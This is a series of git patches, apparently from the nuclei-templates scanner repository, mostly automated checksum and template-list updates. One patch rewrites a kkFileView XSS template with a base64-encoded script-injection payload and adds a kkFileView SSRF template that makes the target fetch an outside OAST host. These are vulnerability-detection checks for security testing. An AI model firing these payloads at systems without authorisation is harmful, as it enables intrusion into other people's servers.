Sat, 1 Jul 2023 13:32:39 +0000 Subject: [PATCH 244/609] Auto Generated New Template Addition List [Sat Jul 1 13:32:39 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d488975828..615f63f067 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ http/cves/2023/CVE-2023-31548.yaml http/cves/2023/CVE-2023-33510.yaml http/cves/2023/CVE-2023-34598.yaml http/cves/2023/CVE-2023-34599.yaml +http/cves/2023/CVE-2023-34659.yaml http/cves/2023/CVE-2023-34843.yaml http/cves/2023/CVE-2023-35843.yaml http/cves/2023/CVE-2023-35844.yaml From f37ade39a81d5691c4bcd7e6e9db5189c574b177 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:32:47 +0000 Subject: [PATCH 245/609] Auto Generated Templates Checksum [Sat Jul 1 13:32:47 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6f191dcaf1..08bcbe8dea 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2299,6 +2299,7 @@ http/cves/2023/CVE-2023-33568.yaml:b70b62eb98696ce5488db3f1988b359cca67f564 http/cves/2023/CVE-2023-34362.yaml:ce4c58e702fbc4fa939ce028c8002a8bd26bab93 http/cves/2023/CVE-2023-34598.yaml:68e4d76fa88dce09b6b339bc9f4b16aef6c211bc http/cves/2023/CVE-2023-34599.yaml:7d4c2c269e401eb61c805a39a5b3cfdb813cf5f8 +http/cves/2023/CVE-2023-34659.yaml:2b633132417a58e4bfd0f03f3302e4cd9d6f11ac http/cves/2023/CVE-2023-34843.yaml:e005d2e2bce6a97efeaf6a81c4b8d6b236cbfefe http/cves/2023/CVE-2023-34960.yaml:fb3f791de2235951e9ad55d33fbc59e1dd89a546 http/cves/2023/CVE-2023-35843.yaml:c6427155bef898736ce1c5524f31e6a093c8b861 @@ -6477,7 +6478,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:faf6f169e1757fc5fff2570f5e1c891281675005 +templates-checksum.txt:cba155ae95724fe70b24fb4d26420db599babd62 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 71c9c3c80fd83e6d70bc643b56c705633875b492 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:33:22 +0000 Subject: [PATCH 246/609] Auto Generated New Template Addition List [Sat Jul 1 13:33:22 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 615f63f067..a775664eb9 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/cves/2023/CVE-2023-27372.yaml http/cves/2023/CVE-2023-30019.yaml http/cves/2023/CVE-2023-31548.yaml http/cves/2023/CVE-2023-33510.yaml +http/cves/2023/CVE-2023-34537.yaml http/cves/2023/CVE-2023-34598.yaml http/cves/2023/CVE-2023-34599.yaml http/cves/2023/CVE-2023-34659.yaml From 88634f8edad3d387379d1669085f4559c2562864 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:33:28 +0000 Subject: [PATCH 247/609] Auto Generated Templates Checksum [Sat Jul 1 13:33:28 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 08bcbe8dea..bff7424b85 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2297,6 +2297,7 @@ http/cves/2023/CVE-2023-32315.yaml:8539e16bd04d7c55c6851e364eefc5989f3831b6 http/cves/2023/CVE-2023-33510.yaml:9882010f9db532ca34df9dcf3e62a4d5a92746c6 http/cves/2023/CVE-2023-33568.yaml:b70b62eb98696ce5488db3f1988b359cca67f564 http/cves/2023/CVE-2023-34362.yaml:ce4c58e702fbc4fa939ce028c8002a8bd26bab93 +http/cves/2023/CVE-2023-34537.yaml:6e347a091d14ed72d6a3579d8f13650648abe6ca http/cves/2023/CVE-2023-34598.yaml:68e4d76fa88dce09b6b339bc9f4b16aef6c211bc http/cves/2023/CVE-2023-34599.yaml:7d4c2c269e401eb61c805a39a5b3cfdb813cf5f8 http/cves/2023/CVE-2023-34659.yaml:2b633132417a58e4bfd0f03f3302e4cd9d6f11ac @@ -6478,7 +6479,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:cba155ae95724fe70b24fb4d26420db599babd62 +templates-checksum.txt:b6f2ba160086be8e69238f01b8a1df1657346609 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 512a6dca5baf6ce592d444aa6bc147d4d01160b6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:34:21 +0000 Subject: [PATCH 248/609] TemplateMan Update [Sat Jul 1 13:34:21 UTC 2023] :robot: --- http/cves/2023/CVE-2023-34659.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 18f4154a1b..ca788e2e54 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -15,6 +15,7 @@ info: cve-id: CVE-2023-34659 cwe-id: CWE-89 metadata: + max-request: 1 shodan-query: http.favicon.hash:1380908726 tags: cve,cve2023,jeecg,sqli From 38f4a65d7d336b840fe2ffaebd0f6860dd835bda Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:35:05 +0000 Subject: [PATCH 249/609] Auto Generated New Template Addition List [Sat Jul 1 13:35:05 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a775664eb9..46c314053b 100644 --- a/.new-additions +++ b/.new-additions @@ -44,3 +44,4 @@ http/misconfiguration/installer/spip-install.yaml http/misconfiguration/odoo-unprotected-database.yaml http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml http/vulnerabilities/vbulletin/arcade-php-sqli.yaml +network/enumeration/psql-user-enum.yaml From dd68087392315ff65ca423908ae1ffd1689504cc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 1 Jul 2023 19:05:09 +0530 Subject: [PATCH 250/609] Update unauth-psql.yaml --- network/misconfig/unauth-psql.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml index fe5c767e76..3ae777ab7b 100644 --- a/network/misconfig/unauth-psql.yaml +++ b/network/misconfig/unauth-psql.yaml @@ -3,7 +3,7 @@ id: unauth-psql info: name: PostgreSQL - Unauthenticated Access author: pussycat0x - severity: High + severity: high description: | Unauthenticated PostgreSQL Detected. reference: From 7edd63064f15c3a1367fb65feb86946c76faad34 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:35:16 +0000 Subject: [PATCH 251/609] TemplateMan Update [Sat Jul 1 13:35:16 UTC 2023] :robot: --- http/cves/2023/CVE-2023-34537.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index aede73ccd1..b5bb94b3a5 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -15,6 +15,7 @@ info: cve-id: CVE-2023-34537 cwe-id: CWE-79 metadata: + max-request: 2 verified: true tags: cve,cve2023,hoteldrui,xss,authenticated From 3fd13e778667412418ac1dbe7b9455d4130b4018 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:35:29 +0000 Subject: [PATCH 252/609] Auto Generated Templates Checksum [Sat Jul 1 13:35:29 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bff7424b85..ea987fd06f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2300,7 +2300,7 @@ http/cves/2023/CVE-2023-34362.yaml:ce4c58e702fbc4fa939ce028c8002a8bd26bab93 http/cves/2023/CVE-2023-34537.yaml:6e347a091d14ed72d6a3579d8f13650648abe6ca http/cves/2023/CVE-2023-34598.yaml:68e4d76fa88dce09b6b339bc9f4b16aef6c211bc http/cves/2023/CVE-2023-34599.yaml:7d4c2c269e401eb61c805a39a5b3cfdb813cf5f8 -http/cves/2023/CVE-2023-34659.yaml:2b633132417a58e4bfd0f03f3302e4cd9d6f11ac +http/cves/2023/CVE-2023-34659.yaml:5cd78aa16534b8ea075d869ae6a456413859eaf0 http/cves/2023/CVE-2023-34843.yaml:e005d2e2bce6a97efeaf6a81c4b8d6b236cbfefe http/cves/2023/CVE-2023-34960.yaml:fb3f791de2235951e9ad55d33fbc59e1dd89a546 http/cves/2023/CVE-2023-35843.yaml:c6427155bef898736ce1c5524f31e6a093c8b861 @@ -6433,6 +6433,7 @@ network/enumeration/beanstalk-service.yaml:ff6de1500ec329dac7a3d24d8e92f9fe8518f network/enumeration/kafka-topics-list.yaml:c169fb5b159e4ea9c9a86122afd1b0f0c4fa4943 network/enumeration/mongodb-info-enum.yaml:9679f4cf1139d8c1e10152ffc13e61f29e1e9905 network/enumeration/niagara-fox-info-enum.yaml:850b5da39d09697db2df5321e4b726e6e7636143 +network/enumeration/psql-user-enum.yaml:09089877153a9fdddd37fcae9ffecc5bc44fc8ef network/enumeration/smtp/smtp-user-enum.yaml:b87cdee6e50d171463194c28ab104f32f51a2f42 network/enumeration/smtp-commands-enum.yaml:833575f9bd672a15739debf1aab8afdb547a0a43 network/expn-mail-detect.yaml:bc3c315e851ed7c29b91b6fbfdbcae84929403b7 @@ -6479,7 +6480,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:b6f2ba160086be8e69238f01b8a1df1657346609 +templates-checksum.txt:bc0ec1b44d3aee07b51205bce77dbf90f9126a1e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From e9eafd5f7d1c7465853019105f30ecbdb37d0b2c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:36:56 +0000 Subject: [PATCH 253/609] TemplateMan Update [Sat Jul 1 13:36:56 UTC 2023] :robot: --- network/enumeration/psql-user-enum.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/enumeration/psql-user-enum.yaml b/network/enumeration/psql-user-enum.yaml index 557dfb4d5a..e35f0ef8d0 100644 --- a/network/enumeration/psql-user-enum.yaml +++ b/network/enumeration/psql-user-enum.yaml @@ -9,8 +9,9 @@ info: reference: - https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 metadata: - verified: "true" + max-request: 2 shodan-query: port:5432 product:"PostgreSQL" + verified: "true" tags: network,postgresql,db,unauth,enum,psql tcp: From 184c4af7df677a2f0c12ad74c4347f32ed236bf1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:38:21 +0000 Subject: [PATCH 254/609] Auto Generated New Template Addition List [Sat Jul 1 13:38:21 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 46c314053b..08816b49fc 100644 --- a/.new-additions +++ b/.new-additions @@ -45,3 +45,4 @@ http/misconfiguration/odoo-unprotected-database.yaml http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml http/vulnerabilities/vbulletin/arcade-php-sqli.yaml network/enumeration/psql-user-enum.yaml +network/misconfig/unauth-psql.yaml From 91a09cd40947081319a221871848ed1b6ab9da70 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:38:32 +0000 Subject: [PATCH 255/609] Auto Generated Templates Checksum [Sat Jul 1 13:38:32 UTC 2023] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ea987fd06f..17a69c12ca 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2297,7 +2297,7 @@ http/cves/2023/CVE-2023-32315.yaml:8539e16bd04d7c55c6851e364eefc5989f3831b6 http/cves/2023/CVE-2023-33510.yaml:9882010f9db532ca34df9dcf3e62a4d5a92746c6 http/cves/2023/CVE-2023-33568.yaml:b70b62eb98696ce5488db3f1988b359cca67f564 http/cves/2023/CVE-2023-34362.yaml:ce4c58e702fbc4fa939ce028c8002a8bd26bab93 -http/cves/2023/CVE-2023-34537.yaml:6e347a091d14ed72d6a3579d8f13650648abe6ca +http/cves/2023/CVE-2023-34537.yaml:606d34bd1144ac841a29e1a229cfd635b5d8b3b4 http/cves/2023/CVE-2023-34598.yaml:68e4d76fa88dce09b6b339bc9f4b16aef6c211bc http/cves/2023/CVE-2023-34599.yaml:7d4c2c269e401eb61c805a39a5b3cfdb813cf5f8 http/cves/2023/CVE-2023-34659.yaml:5cd78aa16534b8ea075d869ae6a456413859eaf0 @@ -6433,7 +6433,7 @@ network/enumeration/beanstalk-service.yaml:ff6de1500ec329dac7a3d24d8e92f9fe8518f network/enumeration/kafka-topics-list.yaml:c169fb5b159e4ea9c9a86122afd1b0f0c4fa4943 network/enumeration/mongodb-info-enum.yaml:9679f4cf1139d8c1e10152ffc13e61f29e1e9905 network/enumeration/niagara-fox-info-enum.yaml:850b5da39d09697db2df5321e4b726e6e7636143 -network/enumeration/psql-user-enum.yaml:09089877153a9fdddd37fcae9ffecc5bc44fc8ef +network/enumeration/psql-user-enum.yaml:0a2f5b0095347687d51554f03cd5141463855dd0 network/enumeration/smtp/smtp-user-enum.yaml:b87cdee6e50d171463194c28ab104f32f51a2f42 network/enumeration/smtp-commands-enum.yaml:833575f9bd672a15739debf1aab8afdb547a0a43 network/expn-mail-detect.yaml:bc3c315e851ed7c29b91b6fbfdbcae84929403b7 @@ -6447,6 +6447,7 @@ network/ganglia-xml-grid-monitor.yaml:64fbc138212f342ee6a6e7998777ad21680d079d network/memcached-stats.yaml:2191e9ce7ab2600a59ee35460890fb61f2aff23c network/misconfig/dropbear-weakalgo.yaml:cf8685d87a0128c0a546c041633a1662d4e814f6 network/misconfig/dropbear-weakmac.yaml:5e49047eec049df0930e0222b820268b2f346024 +network/misconfig/unauth-psql.yaml:208c9de8310963945d2209a146cc4a1532bfc8d2 network/mongodb-unauth.yaml:c44e9fee9e5d0fdc5d17786d08e52bd963a0d1fc network/mysql-native-password.yaml:85827a2b9a5f85a7470a09c3db968ed0d1e22204 network/printers-info-leak.yaml:d264716abc16dd3169d696ba70971190f43cacd1 @@ -6480,7 +6481,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:bc0ec1b44d3aee07b51205bce77dbf90f9126a1e +templates-checksum.txt:6bce83fe882ea151970a9cd70cf304a305c5b5ee wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From d245c816a1db5fe1f5caf176b3a4763660e8e5fe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:39:28 +0000 Subject: [PATCH 256/609] Auto Generated New Template Addition List [Sat Jul 1 13:39:28 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 08816b49fc..9ad28a75dd 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/cves/2012/CVE-2012-6499.yaml http/cves/2021/CVE-2021-46704.yaml http/cves/2022/CVE-2022-40022.yaml http/cves/2023/CVE-2023-0126.yaml +http/cves/2023/CVE-2023-0527.yaml http/cves/2023/CVE-2023-0562.yaml http/cves/2023/CVE-2023-0563.yaml http/cves/2023/CVE-2023-1454.yaml From c9442dde4880ce0dd620c29fd3833b94fec11c81 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:39:34 +0000 Subject: [PATCH 257/609] Auto Generated Templates Checksum [Sat Jul 1 13:39:34 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 17a69c12ca..12df883d5a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2215,6 +2215,7 @@ http/cves/2023/CVE-2023-0099.yaml:9883bc9b1df21a9735c52da82a7689e55842bda4 http/cves/2023/CVE-2023-0126.yaml:de24c5c5d48e69fd17d627b321f6a6cd13bdfd07 http/cves/2023/CVE-2023-0236.yaml:24d5ae19e7c945dfaaf7b240fd276cf3aa190e2a http/cves/2023/CVE-2023-0261.yaml:6c17d82c95c5a12dd3b076059e6d90f248e2c970 +http/cves/2023/CVE-2023-0527.yaml:7c322faf7653c10c206ec5970aa9dff988134a48 http/cves/2023/CVE-2023-0552.yaml:19ffa4072e3f509e9176b63212c9f9ec02149fb6 http/cves/2023/CVE-2023-0562.yaml:b79f3b73e6955a81518118dab31e9a928f01e71e http/cves/2023/CVE-2023-0563.yaml:93aee36718c15680474eddc7ca3dc30523f5cb65 @@ -6481,7 +6482,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:6bce83fe882ea151970a9cd70cf304a305c5b5ee +templates-checksum.txt:ea43d94a57a238218ff7d42986a1d12a67f32dbf wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From d9ba084506728205fbe045ae68c694c908bc9906 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:39:57 +0000 Subject: [PATCH 258/609] TemplateMan Update [Sat Jul 1 13:39:57 UTC 2023] :robot: --- network/misconfig/unauth-psql.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml index 3ae777ab7b..1b74d7bdbb 100644 --- a/network/misconfig/unauth-psql.yaml +++ b/network/misconfig/unauth-psql.yaml @@ -9,8 +9,9 @@ info: reference: - https://www.postgresql.org/docs/9.6/auth-methods.html metadata: - verified: "true" + max-request: 2 shodan-query: port:5432 product:"PostgreSQL" + verified: "true" tags: network,postgresql,db,unauth tcp: From f25faffb8843c4d66bacd2cdd46a6430612bc10c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:40:54 +0000 Subject: [PATCH 259/609] TemplateMan Update [Sat Jul 1 13:40:54 UTC 2023] :robot: --- http/cves/2023/CVE-2023-0527.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index 2b3ee059c4..033ebf4f76 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2023-0527 cwe-id: CWE-79 metadata: + max-request: 1 verified: true tags: cve,cve2023,osghs,xss From 78b9a926d2446f616f8e7ba399f17374789fc669 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 16:37:32 +0000 Subject: [PATCH 261/609] Auto Generated Templates Checksum [Sat Jul 1 16:37:32 UTC 2023] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 12df883d5a..376b2fde1d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2215,7 +2215,7 @@ http/cves/2023/CVE-2023-0099.yaml:9883bc9b1df21a9735c52da82a7689e55842bda4 http/cves/2023/CVE-2023-0126.yaml:de24c5c5d48e69fd17d627b321f6a6cd13bdfd07 http/cves/2023/CVE-2023-0236.yaml:24d5ae19e7c945dfaaf7b240fd276cf3aa190e2a http/cves/2023/CVE-2023-0261.yaml:6c17d82c95c5a12dd3b076059e6d90f248e2c970 -http/cves/2023/CVE-2023-0527.yaml:7c322faf7653c10c206ec5970aa9dff988134a48 +http/cves/2023/CVE-2023-0527.yaml:eef3f7eda2205d193e376033b62a4ef82239d63d http/cves/2023/CVE-2023-0552.yaml:19ffa4072e3f509e9176b63212c9f9ec02149fb6 http/cves/2023/CVE-2023-0562.yaml:b79f3b73e6955a81518118dab31e9a928f01e71e http/cves/2023/CVE-2023-0563.yaml:93aee36718c15680474eddc7ca3dc30523f5cb65 @@ -4970,7 +4970,7 @@ http/takeovers/uberflip-takeover.yaml:efed5863e4dbcba6d03e69fc7080477267c23fce http/takeovers/uptimerobot-takeover.yaml:47264000a2e3e6685a8382b17947125c7c56e2d2 http/takeovers/uservoice-takeover.yaml:3435a0ac07e609e958aa3af843610815dba14477 http/takeovers/vend-takeover.yaml:a86b368cabd5205fe2431e64701a71df2007bfe3 -http/takeovers/webflow-takeover.yaml:71530b08a98f56c8177cfdee4a40cb733d1475fd +http/takeovers/webflow-takeover.yaml:aec4dd3b945215876421bd436b96165a4ce91708 http/takeovers/wishpond-takeover.yaml:9c367683b6008020c084929d622e18a2f2793a8b http/takeovers/wix-takeover.yaml:905340e0d7ddd4640ff1de3e6cb3306592ae08b0 http/takeovers/wordpress-takeover.yaml:b4e0598b906d6f85d2900e9cfaa13b4293f02f43 @@ -6448,7 +6448,7 @@ network/ganglia-xml-grid-monitor.yaml:64fbc138212f342ee6a6e7998777ad21680d079d network/memcached-stats.yaml:2191e9ce7ab2600a59ee35460890fb61f2aff23c network/misconfig/dropbear-weakalgo.yaml:cf8685d87a0128c0a546c041633a1662d4e814f6 network/misconfig/dropbear-weakmac.yaml:5e49047eec049df0930e0222b820268b2f346024 -network/misconfig/unauth-psql.yaml:208c9de8310963945d2209a146cc4a1532bfc8d2 +network/misconfig/unauth-psql.yaml:416b255a199c9a386b4abc910dd34300740d9fd3 network/mongodb-unauth.yaml:c44e9fee9e5d0fdc5d17786d08e52bd963a0d1fc network/mysql-native-password.yaml:85827a2b9a5f85a7470a09c3db968ed0d1e22204 network/printers-info-leak.yaml:d264716abc16dd3169d696ba70971190f43cacd1 @@ -6482,7 +6482,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:ea43d94a57a238218ff7d42986a1d12a67f32dbf +templates-checksum.txt:1695b04ffa967a3c26813b38d1ff22c4ff12a671 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 5603a4344d1ceb0b1db61e1575151fc35acb934d Mon Sep 17 00:00:00 2001 From: Arm!tage <48816467+Arrnitage@users.noreply.github.com> Date: Sun, 2 Jul 2023 00:39:12 +0800 Subject: [PATCH 262/609] fix CVE-2022-46934.yaml (#7505) * fix CVE-2022-46934.yaml * add tags * add kkfileview-ssrf.yaml * misc fixes * Update kkfileview-ssrf.yaml * misc fixes --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> --- http/cves/2022/CVE-2022-46934.yaml | 17 +++++------ http/vulnerabilities/kkfileview-ssrf.yaml | 37 +++++++++++++++++++++++ 2 files changed, 44 insertions(+), 10 deletions(-) create mode 100644 http/vulnerabilities/kkfileview-ssrf.yaml diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index 3db06bc160..86c7b8bb1f 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -20,24 +20,21 @@ info: max-request: 1 shodan-query: http.html:"kkFileView" verified: true - tags: xss,cve,cve2022 + tags: xss,cve,cve2022,kkfileview http: - - raw: - - | - GET /picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmNvb2tpZSk7Ly8=&urls HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls" matchers-condition: and matchers: - type: word words: - - "alert(document.cookie)" - - "document.getElementById" + - document.getElementById("http://");alert(document.domain);//").click(); + - viewer.min.css condition: and - type: status status: - - 200 - -# Enhanced by md on 2023/04/13 + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/kkfileview-ssrf.yaml b/http/vulnerabilities/kkfileview-ssrf.yaml new file mode 100644 index 0000000000..bee1bc98f3 --- /dev/null +++ b/http/vulnerabilities/kkfileview-ssrf.yaml @@ -0,0 +1,37 @@ +id: kkfileview-ssrf + +info: + name: kkFileView 4.0.0 - Server-Side Request Forgery + author: Arm!tage + severity: high + description: | + kkFileView 4.0.0 is susceptible to server-side request forgery + reference: + - https://github.com/kekingcn/kkFileView/issues/296 + classification: + cwe-id: CWE-918 + cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + fofa-query: app="kkFileView" + shodan-query: http.html:"kkFileView" + verified: true + tags: ssrf,kkfileview + +http: + - method: GET + path: + - "{{BaseURL}}/onlinePreview?url={{base64('http://oast.fun/robots.txt')}}" + + extractors: + - type: regex + name: data + group: 1 + regex: + - 'hidden id="textData" value="([A-Za-z0-9=]+)"\/>' + internal: true + + matchers: + - type: dsl + dsl: + - contains(base64_decode(data), "Disallow") \ No newline at end of file From 799e46b846493bf3f007f00ad0ae187d80c62403 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 16:39:31 +0000 Subject: [PATCH 263/609] Auto Generated New Template Addition List [Sat Jul 1 16:39:31 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9ad28a75dd..8f31c890f9 100644 --- a/.new-additions +++ b/.new-additions @@ -44,6 +44,7 @@ http/misconfiguration/grav-register-admin.yaml http/misconfiguration/installer/spip-install.yaml http/misconfiguration/odoo-unprotected-database.yaml http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml +http/vulnerabilities/kkfileview-ssrf.yaml http/vulnerabilities/vbulletin/arcade-php-sqli.yaml network/enumeration/psql-user-enum.yaml network/misconfig/unauth-psql.yaml From 1a89416685a140ffa32cce81149c0df9762495cf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 16:39:39 +0000 Subject: [PATCH 264/609] Auto Generated Templates Checksum [Sat Jul 1 16:39:39 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 376b2fde1d..b9707d3c19 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2202,7 +2202,7 @@ http/cves/2022/CVE-2022-46020.yaml:ba3769558e37986e70e73ddd1577bdb353915229 http/cves/2022/CVE-2022-46169.yaml:fbe0d741142ba9fcc02295b39a798258189413ea 